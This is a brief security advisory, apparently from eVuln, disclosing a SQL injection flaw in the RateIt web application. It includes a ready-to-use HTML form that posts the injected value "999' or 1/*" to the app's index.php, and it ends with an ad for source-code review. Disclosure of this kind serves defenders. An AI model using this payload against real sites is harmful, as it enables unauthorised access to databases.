PoC/Exploit for SQL Injection Vulnerability in RateIt

Published Proof of Concept code - SQL Injection Vulnerability in RateIt.

Description
Available
Solution
Not available - check vendor's website

SQL Injection Example:

<form action="http://[host]/rate/index.php" method="post">
<input name="rate" value="x">
<input name="rateit_id" value="999' or 1/*">
<input name="hotscript_id" value="12345">
<input name="postedcounter" value="1">
<input name="action" value="doit">
<input type="submit" value="Rate!">
</form>

Order Source Code Analysis made by eVuln

Prevent hacking by source code review of your website or web application done by eVuln team.The work will be done by experts in web application security.

Advisories by vuln type